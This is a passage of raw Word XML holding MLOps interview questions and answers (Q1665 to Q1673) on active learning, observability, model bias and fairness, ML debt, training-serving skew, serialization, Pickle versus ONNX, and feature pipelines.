        <w:t>* Data quality validation</w:t>
        <w:br/>
        <w:t>* Feature consistency</w:t>
        <w:br/>
        <w:t>* Model versioning</w:t>
        <w:br/>
        <w:t>* Experiment tracking</w:t>
        <w:br/>
        <w:t>* Performance benchmarking</w:t>
        <w:br/>
        <w:t>* Automated CI/CD pipelines</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools used in retraining pipelines include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow</w:t>
        <w:br/>
        <w:t>* Kubeflow</w:t>
        <w:br/>
        <w:t>* Airflow</w:t>
        <w:br/>
        <w:t>* Jenkins</w:t>
        <w:br/>
        <w:t>* TensorFlow</w:t>
        <w:br/>
        <w:t>* PyTorch</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>From an MLOps perspective, retraining strategies are critical for maintaining production model reliability, scalability, and business accuracy over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1665. What is active learning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Active learning is a machine learning approach where the model selectively chooses the most important or uncertain data samples and requests labels for them from humans or external systems.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The main goal is to reduce the amount of labeled data required while still achieving high model accuracy. This is especially useful because data labeling is often expensive and time-consuming.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Instead of labeling the entire dataset, the model identifies samples where it is least confident and prioritizes those for annotation.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common active learning strategies include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Uncertainty Sampling</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Selects data points where the model has low confidence.</w:t>
        <w:br/>
        <w:t>2. Query by Committee</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Multiple models evaluate data, and samples with the highest disagreement are selected.</w:t>
        <w:br/>
        <w:t>3. Diversity Sampling</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Chooses diverse and representative samples from the dataset.</w:t>
        <w:br/>
        <w:t>4. Entropy-based Sampling</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Selects samples with maximum prediction uncertainty.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* NLP and chatbot training</w:t>
        <w:br/>
        <w:t>* Computer vision annotation</w:t>
        <w:br/>
        <w:t>* Medical imaging</w:t>
        <w:br/>
        <w:t>* Fraud detection</w:t>
        <w:br/>
        <w:t>* Recommendation systems</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of active learning:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Reduces labeling cost</w:t>
        <w:br/>
        <w:t>* Improves model performance with less data</w:t>
        <w:br/>
        <w:t>* Speeds up model development</w:t>
        <w:br/>
        <w:t>* Efficient use of human annotation efforts</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Annotation pipeline complexity</w:t>
        <w:br/>
        <w:t>* Human-in-the-loop dependency</w:t>
        <w:br/>
        <w:t>* Bias in selected samples</w:t>
        <w:br/>
        <w:t>* Continuous retraining requirements</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular tools and frameworks include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Label Studio</w:t>
        <w:br/>
        <w:t>* TensorFlow</w:t>
        <w:br/>
        <w:t>* PyTorch</w:t>
        <w:br/>
        <w:t>* modAL</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>From an MLOps perspective, active learning is integrated with automated pipelines, annotation workflows, and retraining systems to continuously improve AI models efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1666. Explain ML observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML observability is the practice of monitoring, tracking, and analyzing machine learning systems in production to ensure models are performing reliably, accurately, and efficiently over time.</w:t>
        <w:br/>
        <w:t>It helps teams detect issues such as model drift, data quality problems, prediction anomalies, and performance degradation before they impact business outcomes.</w:t>
        <w:br/>
        <w:t>ML observability goes beyond traditional application monitoring because it focuses on both infrastructure metrics and machine learning behavior.</w:t>
        <w:br/>
        <w:t>Key components of ML observability include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks data quality, schema changes, missing values, and feature drift.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Model Performance Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Measures accuracy, precision, recall, latency, and prediction quality in production.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Drift Detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detects data drift and concept drift between training and production data.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Prediction Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Observes prediction distributions, anomalies, and confidence scores.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Infrastructure Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks CPU, GPU, memory, storage, and network utilization.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Logging and Tracing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Captures inference logs, pipeline execution details, and debugging information.</w:t>
        <w:br/>
        <w:t>Popular ML observability tools include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Evidently AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * WhyLabs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Arize AI</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, ML observability is critical for maintaining production model reliability, ensuring compliance, improving troubleshooting, and enabling automated retraining and alerting workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1667. What is model bias?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model bias in machine learning refers to a situation where an AI/ML model produces unfair, inaccurate, or systematically skewed predictions for certain groups, categories, or outcomes.</w:t>
        <w:br/>
        <w:t>Bias usually occurs due to issues in data, feature selection, model design, or training processes. If the training data contains historical imbalance or discrimination, the model can learn and repeat those patterns.</w:t>
        <w:br/>
        <w:t>Common types of model bias include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Bias</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training data is unbalanced or not representative of real-world scenarios.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Sampling Bias</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Certain groups or classes are underrepresented in the dataset.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Algorithmic Bias</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias introduced by the model or optimization approach itself.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Confirmation Bias</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Existing assumptions influence model training or evaluation.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recruitment models favoring one gender</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Facial recognition systems performing poorly for certain ethnic groups</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Loan approval systems unfairly rejecting specific demographics</w:t>
        <w:br/>
        <w:t>Impact of model bias:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Unfair decision-making</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced model trustworthiness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Legal and compliance risks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ethical concerns</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Poor business outcomes</w:t>
        <w:br/>
        <w:t>Techniques to reduce bias include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Balanced dataset collection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fairness-aware training</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias detection testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature selection review</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regular model auditing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Explainable AI techniques</w:t>
        <w:br/>
        <w:t>Common tools used for fairness and bias detection:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Fairness Indicators</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fairlearn</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IBM AI Fairness 360</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, bias monitoring and fairness evaluation are important parts of responsible AI governance and production model validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1668. Explain fairness in ML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fairness in Machine Learning refers to building AI/ML models that make unbiased, equitable, and non-discriminatory decisions across different individuals or groups.</w:t>
        <w:br/>
        <w:t>The objective is to ensure that the model does not unfairly favor or disadvantage people based on sensitive attributes such as gender, age, race, religion, or location.</w:t>
        <w:br/>
        <w:t>Fairness is important because ML models are often used in critical areas like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hiring systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Loan approvals</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Healthcare</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Insurance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Criminal justice</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t>Common fairness concepts include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Demographic Parity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictions should be equally distributed across groups.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Equal Opportunity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Different groups should have equal chances of receiving correct positive outcomes.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Equalized Odds</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Error rates should be similar across groups.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Individual Fairness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Similar individuals should receive similar predictions.</w:t>
        <w:br/>
        <w:t>Causes of unfairness in ML:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Biased training data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Historical discrimination in datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Imbalanced class distribution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Proxy variables indirectly representing sensitive attributes</w:t>
        <w:br/>
        <w:t>Techniques to improve fairness:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Balanced data collection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias mitigation during preprocessing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fairness-aware algorithms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Post-processing prediction adjustments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous fairness monitoring and audits</w:t>
        <w:br/>
        <w:t>Popular fairness tools and frameworks include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fairlearn</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IBM AI Fairness 360</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Fairness Indicators</w:t>
        <w:br/>
        <w:t>From an MLOps and governance perspective, fairness is a key part of responsible AI, helping organizations maintain ethical compliance, reduce legal risks, and build trustworthy AI systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1669. What is ML debt?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML debt (Machine Learning Technical Debt) refers to the long-term maintenance, complexity, and operational challenges that accumulate in machine learning systems due to poor design decisions, shortcuts, or unmanaged dependencies during development and deployment.</w:t>
        <w:br/>
        <w:t>It is similar to software technical debt but more complex because ML systems depend on data, models, pipelines, infrastructure, and continuous monitoring.</w:t>
        <w:br/>
        <w:t>ML debt increases when teams focus only on quick model deployment without proper engineering, governance, or scalability planning.</w:t>
        <w:br/>
        <w:t>Common sources of ML debt include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Dependency Issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Changes in data schema or quality affecting model performance.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Pipeline Complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multiple interconnected preprocessing, training, and deployment workflows becoming hard to maintain.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Model Drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production data changes over time while models are not retrained properly.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Lack of Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No observability for model accuracy, latency, or failures.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Configuration and Versioning Problems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Missing model, dataset, or feature version control.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Hidden Feedback Loops</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model predictions influencing future training data.</w:t>
        <w:br/>
        <w:t>Impact of ML debt:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Increased operational cost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Slower development cycles</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced model reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Difficult troubleshooting</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scalability and maintenance challenges</w:t>
        <w:br/>
        <w:t>Ways to reduce ML debt:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong MLOps practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated CI/CD pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature stores and versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous monitoring and retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Proper documentation and governance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Modular and scalable architecture</w:t>
        <w:br/>
        <w:t>Popular tools used to manage ML operations include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t>From an interview perspective, ML debt is an important concept because production ML systems require continuous maintenance, governance, monitoring, and scalability beyond just model development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1670. Explain training-serving skew.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Training-serving skew is a situation where the data, features, preprocessing logic, or environment used during model training is different from what is used during model inference (serving) in production.</w:t>
        <w:br/>
        <w:t>Because of this mismatch, the model performs well during training/testing but gives poor or inconsistent predictions in real-world production environments.</w:t>
        <w:br/>
        <w:t>Common causes of training-serving skew include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Different Feature Engineering Logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training and serving pipelines apply different transformations or calculations.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data Distribution Changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production data differs from training data patterns.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Missing or Delayed Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Some features available during training are unavailable during inference.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Version Mismatch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Different preprocessing libraries, model versions, or configurations between environments.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Inconsistent Data Handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Null values, encoding, scaling, or normalization handled differently.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * During training, missing values are replaced with averages.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * In production, missing values are treated as zero.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * This causes prediction inconsistencies.</w:t>
        <w:br/>
        <w:t>Impact of training-serving skew:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced model accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Unstable predictions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production failures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Difficult debugging and monitoring</w:t>
        <w:br/>
        <w:t>Ways to prevent training-serving skew:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use shared feature pipelines for training and inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Implement feature stores</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintain strict version control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automate CI/CD and validation checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitor production data continuously</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Perform shadow testing and canary deployments</w:t>
        <w:br/>
        <w:t>Popular tools helping reduce skew include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Extended</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feast</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, minimizing training-serving skew is critical for maintaining reliable, reproducible, and production-ready ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1671. What is model serialization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model serialization is the process of saving a trained machine learning model into a file format so it can be stored, transferred, shared, or loaded later for inference or further training.</w:t>
        <w:br/>
        <w:t>Serialization converts the model, including its learned parameters, architecture, and metadata, into a portable format that can be reused without retraining the model from scratch.</w:t>
        <w:br/>
        <w:t>Common purposes of model serialization include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backup and recovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sharing models across environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Serving predictions in production systems</w:t>
        <w:br/>
        <w:t>Common serialization formats and methods include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pickle / Joblib for Python-based ML models</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SavedModel in TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TorchScript / .pt files in PyTorch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX (Open Neural Network Exchange) for cross-platform compatibility</w:t>
        <w:br/>
        <w:t>Example workflow:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Train the model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Serialize and save the model file</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Load the serialized model in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Perform inference without retraining</w:t>
        <w:br/>
        <w:t>Benefits of model serialization:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Portability across systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced compute cost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy rollback and version management</w:t>
        <w:br/>
        <w:t>Challenges include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Version compatibility issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security risks with unsafe deserialization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependency mismatches across environments</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, model serialization is an important step in the ML lifecycle because it enables scalable deployment, CI/CD integration, reproducibility, and efficient production serving of machine learning models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1672. Difference between Pickle and ONNX?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pickle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ONNX</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Definition</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Python-based serialization library used to save ML models and Python objects</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Open standard format for representing ML and deep learning models</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Primary Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Saving and loading models in Python environments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cross-platform model interoperability and deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Compatibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mostly limited to Python</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supports multiple frameworks and languages</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Framework Support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Commonly used with scikit-learn and Python models</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supports TensorFlow, PyTorch, scikit-learn, and others</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low portability outside Python ecosystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Highly portable across platforms and runtimes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unsafe if loading untrusted files because arbitrary code can execute</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Safer compared to Pickle since it stores computation graphs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Best for internal Python applications</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Best for production and multi-platform deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good for simple serialization</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Optimized for inference performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>File Content</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores full Python object structure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores model architecture, weights, and computation graph</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited in enterprise production systems</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Widely used in enterprise AI deployment pipelines</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime Support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Requires Python environment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supports ONNX Runtime and hardware accelerators</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use Case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Quick model saving/loading during development</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Model serving, edge AI, cloud inference, interoperability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Use Pickle when working completely inside Python-based environments.</w:t>
        <w:br/>
        <w:t>* Use ONNX when deploying models across different platforms, languages, or hardware accelerators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1673. Explain feature pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature pipelines are automated workflows used to collect, process, transform, validate, and deliver features for machine learning models during both training and inference.</w:t>
        <w:br/>
        <w:t>A feature pipeline ensures that the same feature engineering logic is consistently applied across the entire ML lifecycle, helping maintain reliable and reproducible model performance.</w:t>
        <w:br/>
        <w:t>Typical stages in a feature pipeline include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Ingestion</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Collecting raw data from databases, APIs, logs, streaming systems, or data lakes.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data Cleaning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling missing values, duplicates, invalid records, and inconsistencies.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Feature Transformation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scaling, encoding, normalization, aggregation, or deriving new features.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Feature Validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Checking schema, quality, drift, and consistency.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Feature Storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storing processed features in a feature store for reuse.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Feature Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Delivering features to training pipelines and real-time inference systems.</w:t>
        <w:br/>
        <w:t>Feature pipelines are important because they help prevent:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training-serving skew</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Duplicate feature engineering work</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data inconsistency issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manual processing errors</w:t>
        <w:br/>
        <w:t>Common types of feature pipelines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch pipelines for scheduled processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Streaming pipelines for real-time ML systems</w:t>
        <w:br/>
        <w:t>Popular tools used for feature pipelines include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Spark</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
